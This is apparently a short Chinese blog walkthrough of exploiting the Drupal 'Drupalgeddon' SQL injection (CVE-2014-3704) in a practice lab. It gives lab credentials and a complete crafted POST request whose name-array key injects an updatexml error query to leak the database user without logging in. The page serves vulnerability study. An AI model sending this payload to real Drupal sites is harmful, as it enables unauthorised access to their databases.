Drupal <7.32“ Drupalgeddon” SQL注入漏洞(CVE-2014-3704)

2023-09-25 11:52:40

1.访问靶场
Drupal <7.32“ Drupalgeddon” SQL注入漏洞(CVE-2014-3704)

2.注册,添加账号
数据库名 drupal,账号密码root/root

3.实施注入
Drupal <7.32“ Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
可以不输入账号和密码就能够获得数据库相关信息。
修改数据包:、
POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

4.结果展示
Drupal <7.32“ Drupalgeddon” SQL注入漏洞(CVE-2014-3704)

Drupal <7.32“ Drupalgeddon” SQL注入漏洞(CVE-2014-3704)

Drupal <7.32“ Drupalgeddon” SQL注入漏洞(CVE-2014-3704)

上一篇:【一笔带过】如何在ubuntu上挂载windows上的共享文件夹


下一篇:Double 类型java.lang.NumberFormatException: Infinite or NaN